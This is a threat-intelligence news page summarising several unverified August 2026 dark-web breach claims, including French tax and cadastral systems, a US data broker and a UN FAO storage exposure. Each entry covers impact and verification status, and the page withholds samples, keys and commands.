2026-08-13T17:42:59.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Government / Land Registry Reported Live ## French Cadastral Data Server Allegedly Breached, 2 Million Property Holders Exposed and Access Still Claimed The group posting as **ZeroBytes** claims a second intrusion at France's **Direction générale des Finances publiques**, this time against the professional cadastral data server that holds land and property registry information. They describe **252,149 extracted rows** covering **2,041,778 individuals**, since each row can list several property holders, and estimate that around **20 million citizens** were reachable through the system although extraction was never completed. Access is attributed to **valid credentials combined with a multi factor authentication bypass**, with no VPN required. The actors state they **remain logged in** and are offering that access for sale alongside the data. The claim is **unverified**. Severity CRITICAL People affected2,041,778 AccessClaimed ongoing Rows252,149 ActorZeroBytes ### ▣Post details TargetDGFiP cadastral data server Country![France flag](https://flagcdn.com/w40/fr.png)France SectorGovernment / Property registry ListingPartial database and access Extracted252,149 rows Breach dated29 July 2026 ObservedAug 13, 2026 ActorZeroBytes ### !Claimed access - Cadastral property records - Property holder identities - Multiple holders per parcel - Valid account credentials - Multi factor bypass - Continuing panel access - Wider unextracted population ### ◱Screenshot [ ![French DGFiP cadastral data server breach claim forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/293785987263598762359876234987621.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/293785987263598762359876234987621.png) ### ⚠Potential impact Cadastral records establish **who owns which property and where it is**, which links named individuals to real assets at fixed addresses. That supports wealth profiling and physical targeting in a way ordinary contact data does not, and because several holders can appear against one parcel, it also exposes **family and co ownership relationships**. The more urgent element is the claim of **continuing access**. If accurate, the exposure is not bounded by the 252,149 rows taken so far, and the actors state the constraint was extraction effort rather than any control stopping them. A multi factor bypass would indicate the authentication layer did not hold. ### iStatus Unverified This is the **second claim against the same French tax authority from this group in two days**. The 20 million figure is their estimate of what was reachable, not what was taken, and should not be read as a record count. A sample is hosted across three mirrors, which **Dark Web Informer is not reproducing** along with the contact channels. The assertion that the intrusion has gone **publicly unacknowledged** is the actors' own and is uncorroborated. The claim is **unverified** and the DGFiP has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Zro Global Hiring Platform Allegedly Breached, 55,866 Candidates Exposed Along With Interview Audio URL: https://darkwebinformer.com/zro-global-hiring-platform-allegedly-breached-55-866-candidates-exposed-along-with-interview-audio/ Last updated: 2026-08-13T17:25:28.000Z Breach Report Latin America Fintech / Recruitment Data for Sale ## Zro Global Hiring Platform Allegedly Breached, 55,866 Candidates Exposed Along With Interview Audio An actor posting as **sta6** is selling what they describe as the complete recruitment pipeline of **Zro Global**, a Latin American fintech, covering every hiring thread processed by its platform up to **8 August 2026**. The dataset is said to hold **55,866 candidate records** with full names, personal email addresses, direct phone numbers, employment histories, and **complete CV text extracted from uploaded documents**. Alongside these are internal evaluation scores and automated competency assessments, the **scoring logic and decision thresholds** used to advance or reject applicants, and **full fidelity audio recordings of candidate interviews**. The actor attributes access to a **zero authentication flaw**. The claim is **unverified**. Severity CRITICAL Candidates55,866 Also takenInterview audio VectorZero auth flaw Actorsta6 ### ▣Post details TargetZro Global RegionLatin America SectorFintech / Talent acquisition ListingFor sale, samples free Candidates55,866 CoverageInception to Aug 2026 ObservedAug 13, 2026 Actorsta6 ### !Allegedly included - Interview audio recordings - Full names - Personal email addresses - Direct phone numbers - Employment histories - Full CV text - Candidate evaluation scores - Automated competency assessments - Hiring decision timelines - Evaluation prompt logic - Scoring weightings - Advance and reject thresholds - Confidence intervals - Fallback heuristics ### ◱Screenshot [ ![Zro Global recruitment platform data breach sale listing screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/345629378569287659872635987239875.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/345629378569287659872635987239875.png) ### ⚠Potential impact The **interview audio is the gravest element**. A person's voice cannot be reissued, and a full fidelity recording is sufficient to produce convincing synthetic speech, which matters especially where voice is used to authenticate customers by telephone. Candidates supplied those recordings to apply for a job, not to have their voice published. The **CV text and employment histories** form a complete professional identity, and the **evaluation records reveal how each applicant was scored and why they were rejected**, which is information they were never shown. Exposure of the underlying scoring logic raises a separate question about fairness and auditability of automated hiring decisions. ### iStatus Unverified Twenty five sample records including audio are hosted publicly; **Dark Web Informer is not reproducing that location or the contact identifiers**. The actor claims to have validated the data against public professional profiles, which is their own assertion. The opening line indicates a **prior approach to the company that did not result in payment**, placing this among leaks published after a failed extortion. The account is recent with a single post. Nothing has been independently corroborated. The claim is **unverified** and Zro Global has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### EVA VR Arena Data Allegedly Leaked, 20,000 Customers Exposed and €1M in Gift Cards Generated URL: https://darkwebinformer.com/eva-vr-arena-data-allegedly-leaked-20-000-customers-exposed-and-eur1m-in-gift-cards-generated/ Last updated: 2026-08-13T17:10:54.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Leisure / VR Entertainment Free Download ## EVA VR Arena Data Allegedly Leaked, 20,000 Customers Exposed and €1M in Gift Cards Generated A forum user posting as **4me44** has published what they describe as customer data from a French location of **EVA**, an operator of competitive virtual reality battle arenas. The release covers **20,274 records** containing names, usernames, email addresses, **dates of birth, phone numbers, and full home addresses**. More significant than the records is what the actor claims alongside them: administrative access to the operator's back office, demonstrated by **generating a campaign of 1,000 gift cards worth €1,000,000** and publishing working voucher codes. The actor also claims access to **money transfer and reservation functions**. The claim is **unverified**. Severity HIGH Records20,274 Vouchers created€1,000,000 PriceFree Actor4me44 ### ▣Post details TargetEVA, Nantes Sud location Country![France flag](https://flagcdn.com/w40/fr.png)France SectorLeisure / VR entertainment ListingFree, reply or upgrade Records20,274 lines Also claimedBack office admin access ObservedAug 13, 2026 Actor4me44 ### !Allegedly included - Full names - Email addresses - Usernames and display names - Dates of birth - Gender - Phone numbers - Street addresses - Cities and postal codes - Newsletter preferences - Membership expiry dates - Gift card campaign function - Money transfer function - Reservation records - Vendor records ### ◱Screenshots [ ![EVA VR arena France customer database leak forum post screenshot, August 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/823798564287365987623598762394587629873652.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/823798564287365987623598762394587629873652.png) [ ![EVA VR arena France customer database leak forum post screenshot, August 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/823798564287365987623598762394587629873653.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/823798564287365987623598762394587629873653.png) ### ⚠Potential impact The customer records carry no passwords or payment details, but **name, date of birth, home address and phone together** remain a workable identity and social engineering set. The more urgent element is the claimed **write access to the operator's voucher system**. Generating redeemable value inside a live back office is not data theft, it is **direct financial fraud against the business**, and any codes issued remain valid until the operator identifies and voids them. The same access, if genuine, would also reach the money transfer and reservation functions the actor lists. Because the release covers a **single venue while a separate actor is said to hold the national dataset**, the wider customer base may be exposed independently. ### iStatus Unverified A record sample is published and the field structure is consistent with a platform export. Dark Web Informer is **not reproducing the voucher codes, which are live financial instruments, nor the download location**. The actor states a **different group already published a dataset covering all locations**, and describes their own release as a partial extract with substantial overlap. The account is recent with no standing. Nothing has been independently corroborated. The claim is **unverified** and EVA has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Data Broker EnformionGO Allegedly for Sale, 315 Million Person Profiles With Address Histories Listed URL: https://darkwebinformer.com/data-broker-enformiongo-allegedly-for-sale-315-million-person-profiles-with-address-histories-listed/ Last updated: 2026-08-13T15:56:40.000Z Breach Report ![United States flag](https://flagcdn.com/w40/us.png)United States Data Broker / Identity Verification Data for Sale ## Data Broker EnformionGO Allegedly for Sale, 315 Million Person Profiles With Address Histories Listed A seller posting as **palmbeachpete** is advertising what they describe as the database of **EnformionGO**, a US identity verification and people search platform operated by Enformion that sells public records access and data enrichment to businesses. The listing claims **315,652,013 unique persons**, **522 million email addresses**, and **593 million phone numbers**. The published sample shows a profile far deeper than a contact record, combining name, aliases, date of birth, and a **multi decade address history with geographic coordinates**, alongside phone numbers annotated with carrier, line type, and connection status. The asking price is **$50,000**. The claim is **unverified**. Severity CRITICAL Persons315,652,013 Phone numbers592,965,410 Price$50,000 Actorpalmbeachpete ### ▣Post details TargetEnformionGO Country![United States flag](https://flagcdn.com/w40/us.png)United States SectorData brokerage / Identity ListingSale, $50,000 negotiable Persons315.6 million claimed Emails522 million ObservedAug 13, 2026 Actorpalmbeachpete ### !Allegedly included - Full names - Known aliases - Dates of birth and age - Historical addresses - Address geocoordinates - Occupancy date ranges - States, cities and counties - Phone numbers - Carrier and line type - Connection status - Email addresses - Opt out status flags - Property value indicators - Record crawl timestamps ### ◱Screenshot [ ![EnformionGO data aggregator database sale listing screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/23578969287356987236659872697835987293.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/23578969287356987236659872697835987293.png) ### ⚠Potential impact The claimed figure approaches the entire US adult population, and the material difference from an ordinary marketing list is **history**. A profile tracing every address a person has occupied since the 1990s, with dates and coordinates, is a **life record rather than a contact record**, and it answers precisely the questions used for knowledge based identity verification. It is also the shape of dataset that enables locating people who have deliberately moved, which matters for anyone who has relocated to escape another person. Because the source is a broker rather than a service the subjects signed up to, **most people in it never chose to be there**, and the sample includes an opt out field, meaning individuals who asked to be excluded may still be represented. ### iStatus Unverified The seller account was **created hours before posting and holds a single post**, which is weak provenance for a claim of this size. Against that, the sample is **internally consistent and structurally specific**, using field names and nesting characteristic of a genuine aggregator export rather than an assembled list. Dark Web Informer is **not reproducing the sample record or contact route**. Whether this is a fresh compromise, resold access, or recirculated broker material is unestablished. The claim is **unverified** and Enformion has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Bolivia's State Housing Agency Allegedly Breached, 36,046 Staff Records With Identity Numbers Published URL: https://darkwebinformer.com/bolivias-state-housing-agency-allegedly-breached-36-046-staff-records-with-identity-numbers-published/ Last updated: 2026-08-13T15:34:21.000Z Breach Report ![Bolivia flag](https://flagcdn.com/w40/bo.png)Bolivia Government / Housing Free Download ## Bolivia's State Housing Agency Allegedly Breached, 36,046 Staff Records With Identity Numbers Published A threat actor posting as **konata\_izumi\_shell** claims to have breached the **Agencia Estatal de Vivienda**, the Bolivian government body responsible for housing policy, subsidies, and social housing programmes for low income families, and extracted its complete personnel database. The release is described as **36,046 records in SQL format** containing **full names, CI national identity card numbers, and each person's role within the institution**. Roles visible in the published sample are predominantly **construction and site trades**, including bricklayers, technicians, site supervisors, and social monitoring staff. The file is offered as a free download. The claim is **unverified**. Severity HIGH Records36,046 PriceFree FormatSQL Actorkonata\_izumi\_shell ### ▣Post details TargetAgencia Estatal de Vivienda Country![Bolivia flag](https://flagcdn.com/w40/bo.png)Bolivia SectorGovernment / Social housing ListingFree direct download Records36,046 DataNames, ID numbers, roles ObservedAug 13, 2026 Actorkonata\_izumi\_shell ### !Allegedly included - Full names - CI identity card numbers - Departmental ID suffixes - Institutional roles - Trade classifications - Supervisory positions ### ◱Screenshot [ ![Bolivian state housing agency personnel database leak forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/798624395786239875628976598726359872.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/798624395786239875628976598726359872.png) ### ⚠Potential impact The field set is narrow, which limits the immediate risk relative to datasets carrying addresses or bank details. The concern is that a **CI number paired with a full name is the basis of Bolivian identity verification** and cannot be reissued, so exposure is permanent even where the surrounding data is thin. The **workforce composition matters** here: roles in the sample are largely manual construction trades on state housing projects, a population with limited means to monitor or contest misuse of their identity documents. The **record count is notably high** for a single agency's payroll, which may indicate contractors and programme labour rather than permanent staff alone. ### iStatus Unverified The post publishes a sample of insert statements consistent with a genuine SQL export and points to an external host for the file, which **Dark Web Informer is not reproducing**. This is the **same actor behind a claimed breach of Bolivia's Ministry of Health published weeks earlier**, indicating sustained targeting of Bolivian public institutions. Neither the record count nor the file has been independently corroborated. The claim is **unverified** and the agency has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Belgian Consumer Database Allegedly Exposed, 148,251 Citizens With Bank Account Numbers and Birth Dates URL: https://darkwebinformer.com/belgian-consumer-database-allegedly-exposed-148-251-citizens-with-bank-account-numbers-and-birth-dates/ Last updated: 2026-08-12T22:59:31.000Z Breach Report ![Belgium flag](https://flagcdn.com/w40/be.png)Belgium Data Broker / Marketing Free Download ## Belgian Consumer Database Allegedly Exposed, 148,251 Citizens With Bank Account Numbers and Birth Dates An actor posting as **exfilar** claims to have found an unsecured marketing database holding **148,251 Belgian consumer records**, described as left accessible with **no authentication and no encryption**. The 81MB export is said to contain **40,455 bank account numbers**, 52,688 email addresses, 43,234 phone numbers, and full names, postal addresses, genders, dates of birth, and subscription details, covering **every province in Belgium**. The operator is not identified: the actor describes it only as a **data broker or loyalty programme aggregator** and states the host is unknown, meaning affected citizens have **no named party to approach**. The claim is **unverified**. Severity CRITICAL Citizens148,251 Bank accounts40,455 OperatorUnidentified Actorexfilar ### ▣Post details TargetUnidentified data broker Country![Belgium flag](https://flagcdn.com/w40/be.png)Belgium SectorMarketing / Data aggregation ListingFree, reply to unlock Records148,251 across 5 files CauseClaimed open server ObservedAug 12, 2026 Actorexfilar ### !Allegedly included - IBAN bank account numbers - BIC bank codes - Legacy account numbers - Full names and titles - Dates of birth - Gender - Street and house numbers - Apartment or box numbers - Postal codes and cities - Primary phone numbers - Secondary phone numbers - Email addresses - Subscription types - Order identifiers ### ◱Screenshots [ ![Belgian consumer database exposure forum post screenshot, August 2026 (1 of 3)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/1327685782934671357986128974598712.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/1327685782934671357986128974598712.png) [ ![Belgian consumer database exposure forum post screenshot, August 2026 (2 of 3)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/1327685782934671357986128974598713.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/1327685782934671357986128974598713.png) [ ![Belgian consumer database exposure forum post screenshot, August 2026 (3 of 3)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/1327685782934671357986128974598714.png) Screenshot 3 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/1327685782934671357986128974598714.png) ### ⚠Potential impact An **IBAN paired with a verified name, home address, and date of birth** is the strongest combination in this dataset. It supports direct debit fraud, and it makes a caller reciting a person's own account details and birth date extremely difficult to doubt. Because the records also carry **subscription type and order identifiers**, a fraudulent message can reference a service the recipient actually holds. The exposure is aggravated by the operator being unknown: **nobody can be notified, no controller can be held to account, and affected citizens cannot check whether they are included**. Under GDPR this would be a reportable breach, but only once a controller is identified. ### iStatus Unverified The actor publishes record samples but **names no company and states the host is unknown**, so the claim cannot be checked against any operator and the origin of the aggregation is unestablished. Dark Web Informer is **not reproducing the sample records, which contain living individuals' bank details**. The post credits a **scanning tool the actor is separately selling for $50,000**, and advertises paid penetration testing. This is the seventh listing from this actor in eight days. The claim is **unverified**. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### UN FAO Climate Mapping Tool Allegedly Left Publicly Writable, 138,000 Government Boundary Files Exposed URL: https://darkwebinformer.com/un-fao-climate-mapping-tool-allegedly-left-publicly-writable-138-000-government-boundary-files-exposed/ Last updated: 2026-08-12T20:38:47.000Z Breach Report International Organisation UN Agency / Climate Data Reported Live ## UN FAO Climate Mapping Tool Allegedly Left Publicly Writable, 138,000 Government Boundary Files Exposed An actor posting as **exfilar** claims that two cloud storage buckets belonging to **ABC-Map**, a geospatial climate adaptation tool operated by the **UN Food and Agriculture Organization** and funded by the French Development Agency, are publicly accessible with **no authentication and no access rules**. The buckets are said to hold **138,346 files** spanning global government administrative boundary datasets, internal field project data, and contract documents. The significant claim is not the reading but the writing: the actor states the storage **accepts uploads and overwrites from anyone on the internet**, and reports the condition as **live today**. The claim is **unverified**. Severity CRITICAL StatusReported live AccessRead and write Files138,346 Actorexfilar ### ▣Post details TargetABC-Map, UN FAO RegionInternational, global datasets SectorUN agency / Climate data ListingFree, open bucket Volume138,346 files, 11GB CauseClaimed misconfiguration ObservedAug 12, 2026 Actorexfilar ### !Allegedly included - Government boundary datasets - Sub-district boundary data - FAO project boundaries - Field plot survey data - Forestry inventories - Soil and elevation data - Fire damage reports - Grassland classifications - Contract documents - Consultant CVs - Payment terms - Project staff contact details - Platform API keys - Mapping service key ### ◱Screenshots [ ![UN FAO ABC-Map storage exposure forum post screenshot, August 2026 (1 of 4)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/2345987235987263959287359872359872.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/2345987235987263959287359872359872.png) [ ![UN FAO ABC-Map storage exposure forum post screenshot, August 2026 (2 of 4)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/2345987235987263959287359872359873.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/2345987235987263959287359872359873.png) [ ![UN FAO ABC-Map storage exposure forum post screenshot, August 2026 (3 of 4)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/2345987235987263959287359872359874.png) Screenshot 3 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/2345987235987263959287359872359874.png) [ ![UN FAO ABC-Map storage exposure forum post screenshot, August 2026 (4 of 4)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/2345987235987263959287359872359875.png) Screenshot 4 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/2345987235987263959287359872359875.png) ### ⚠Potential impact Much of the boundary data is openly licensed, so the reading side matters far less than the writing side. **Write access to a live UN agency's storage is an integrity problem, not a confidentiality one**. Altered boundary files would silently corrupt the climate and biodiversity analyses that governments in developing countries draw on, with no visible sign that anything changed. The same access would permit **content to be hosted under a UN-affiliated domain**, which carries reputation that security filters and staff both extend trust to, and would equally permit the entire dataset to be deleted. A smaller but real exposure is the **contract material, which names project staff and consultants with direct contact details**. ### iStatus Unverified The post contains **bucket identifiers, API keys, endpoints, and ready-to-run commands for both reading and writing**, none of which Dark Web Informer is reproducing while the exposure is reported as unremediated. The actor characterises this as a configuration default never changed rather than any intrusion, and states the buckets could be locked at any time. This is the **sixth listing from this actor in eight days**, all from the same automated scanning operation. Nothing has been independently corroborated. The claim is **unverified** and the FAO has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### French Tax Administration Allegedly Breached via Internal VPN, 678,000 Taxpayer Records Offered URL: https://darkwebinformer.com/french-tax-administration-allegedly-breached-via-internal-vpn-678-000-taxpayer-records-offered/ Last updated: 2026-08-12T19:19:30.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Government / Tax Administration Data for Sale ## French Tax Administration Allegedly Breached via Internal VPN, 678,000 Taxpayer Records Offered A group posting as **ZeroBytes** claims to have breached the French tax administration's public portal and is selling a partial database of **678,438 records** dated to **June 2026**. The actors state they obtained **VPN credentials from internal servers**, used them to reach an internal search tool covering **both individual and business taxpayers**, and began extracting data before being disconnected. They claim access to **multiple internal tools** and estimate the reachable population at tens of millions, while acknowledging the extraction was never completed. A sample of 1,126 records is hosted publicly. The actors further allege the **intrusion was detected but never publicly acknowledged**. The claim is **unverified**. Severity CRITICAL Records678,438 VectorInternal VPN Breach datedJune 2026 ActorZeroBytes ### ▣Post details TargetFrench tax administration portal Country![France flag](https://flagcdn.com/w40/fr.png)France SectorGovernment / Taxation ListingPartial database for sale Records678,438 extracted Sample1,126 records, public host ObservedAug 12, 2026 ActorZeroBytes ### !Claimed access - Internal VPN credentials - Individual taxpayer search - Professional taxpayer search - Multiple internal tools - Partial data extraction ### ◱Screenshot [ ![French tax administration database breach claim forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/789236549786239587623987562938746298759872.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/789236549786239587623987562938746298759872.png) ### ⚠Potential impact Tax records are among the most sensitive holdings any state maintains, combining verified identity with income, property, household composition, and address. A taxpayer cannot opt out of the relationship, and **tax identifiers cannot be reissued**. Because the data is authoritative, it is also unusually effective for **fraud impersonating the tax authority**, a scam already common in France, since a caller can quote details only the administration should hold. The claimed vector matters as much as the data: **VPN access to internal search tools is a position, not a one-off extraction**, and the actors say what they took was limited only by being disconnected. If credentials were reused or persist, the exposure is not bounded by the 678,438 figure. ### iStatus Unverified The post publishes no field list and no visible sample, only a record count and mirrored download links, which **Dark Web Informer is not reproducing**. The data is dated to June, roughly six weeks before the listing. The allegation that the intrusion was **observed but never disclosed** is the actors' own and is uncorroborated; under GDPR a confirmed breach of this scale would carry notification duties. Nothing has been independently verified. The claim is **unverified** and the tax administration has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Seller Offers Live Deep Link Keys Enabling Phishing on a Shared Domain Trusted by 2,553 Apps URL: https://darkwebinformer.com/seller-offers-live-deep-link-keys-enabling-phishing-on-a-shared-domain-trusted-by-2-553-apps/ Last updated: 2026-08-12T18:18:26.000Z Capability Listing Global Reach Mobile / Deep Linking Phishing Infrastructure ## Seller Offers Live Deep Link Keys Enabling Phishing on a Shared Domain Trusted by 2,553 Apps An actor posting as **exfilar** is selling three live production API keys for **Branch**, a mobile deep linking platform, which they say permit unlimited link creation on Branch's **default shared link domain**, **bnc.lt**. The seller states the domain is used for legitimate deep links by **2,553 mobile applications** across banking, retail, travel, healthcare, and social sectors, and that links they generate are indistinguishable from genuine ones. The keys were reportedly harvested from **publicly published developer packages** rather than any intrusion. **No application has been breached**, and the named apps are users of the shared domain, not victims of a compromise. Price is **$15,000**. Severity HIGH Apps trusting domain2,553 Live keys3 Price$15,000 Actorexfilar ### ▣Listing details TypeCapability sale, not a breach PlatformBranch deep linking SectorMobile app infrastructure Listing$15,000, escrow, crypto SourcePublic developer packages Reach666 iOS, 1,887 Android apps ObservedAug 12, 2026 Actorexfilar ### !Advertised capability - Link creation on shared domain - Custom link aliases - Preview title control - Preview description control - Preview image control - Arbitrary destination URLs - Platform-specific redirects - No observed rate limiting - Links persist without expiry - Attribution report on affected apps ### ◱Screenshots [ ![Deep link API key sale listing screenshot, August 2026 (1 of 4)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/9278935798662359876235987623598762.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/9278935798662359876235987623598762.png) [ ![Deep link API key sale listing screenshot, August 2026 (2 of 4)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/9278935798662359876235987623598763.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/9278935798662359876235987623598763.png) [ ![Deep link API key sale listing screenshot, August 2026 (3 of 4)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/9278935798662359876235987623598764.png) Screenshot 3 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/9278935798662359876235987623598764.png) [ ![Deep link API key sale listing screenshot, August 2026 (4 of 4)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/9278935798662359876235987623598765.png) Screenshot 4 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/9278935798662359876235987623598765.png) ### ⚠Potential impact Nothing has been stolen; what is being sold is **borrowed reputation**. A phishing link on a shared domain that thousands of legitimate apps use every day inherits their trust: **corporate allowlists permit it, spam filters pass it, and it triggers no newly-registered-domain or typosquatting alerts**. It also defeats the advice users are actually given, since checking the domain and the certificate both come back clean. Because the seller controls the link preview text and image as well as the destination, a message can be made to look like a notification from an app the recipient uses. The **practical defence is to stop treating shared link domains as trustworthy by reputation**, and for app operators to move to their own branded link domain where the platform allows it. ### iStatus Unverified Dark Web Informer is **not reproducing the keys, the packages they were taken from, the key format, the endpoints, the collection method, or the contact route**, since together these would constitute working phishing infrastructure. The named applications are **users of a shared domain and have not been compromised**; nor is any intrusion into the platform claimed. The seller characterises this as an architectural weakness rather than a vulnerability, which the platform operator has not addressed publicly. This is the **fifth listing from this actor in a week**. The claim is **unverified**. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Gran Caribe Hotel Group Allegedly Breached, 26,000 Guest Passport Records and Full Corporate Systems Offered URL: https://darkwebinformer.com/gran-caribe-hotel-group-allegedly-breached-26-000-guest-passport-records-and-full-corporate-systems-offered/ Last updated: 2026-08-11T17:50:03.000Z Breach Report ![Cuba flag](https://flagcdn.com/w40/cu.png)Cuba Hospitality / State Enterprise Data for Sale ## Gran Caribe Hotel Group Allegedly Breached, 26,000 Guest Passport Records and Full Corporate Systems Offered An actor posting as **exfilar** is advertising what they describe as a complete dump of **Gran Caribe Hotel Group**, Cuba's largest state-owned tourism corporation, comprising **34 database backups totalling 110GB** taken from production servers. The material is said to span eight hotel properties and include **26,094 guest records with full names, nationalities, passport numbers, dates of birth, and stay dates** covering visitors from 70 countries, **873 employee files with salaries, national identity numbers, addresses and bank details**, complete accounting and inventory systems, loyalty membership data, and **guest internet accounts tied to Cuban identity numbers**. The asking price is **$10,000**. The claim is **unverified**. Severity CRITICAL Guest records26,094 Volume110GB Price$10,000 Actorexfilar ### ▣Post details TargetGran Caribe Hotel Group Country![Cuba flag](https://flagcdn.com/w40/cu.png)Cuba SectorHospitality / State-owned ListingSale — $10,000, escrow Volume34 databases / 110GB Scope8 properties, 2022–2025 ObservedAug 11, 2026 Actorexfilar ### !Allegedly included - Guest passport numbers - Guest names & nationalities - Dates of birth - Check-in and check-out dates - Room assignments & billing - Employee salaries - Employee bank details - Cuban identity numbers - Staff addresses & phone numbers - Loyalty programme members - Guest internet credentials - Telecom billing records - Security operator accounts - Accounting & budget systems - Supplier contracts - Inventory & asset registers ### ◱Screenshots [ ![Gran Caribe 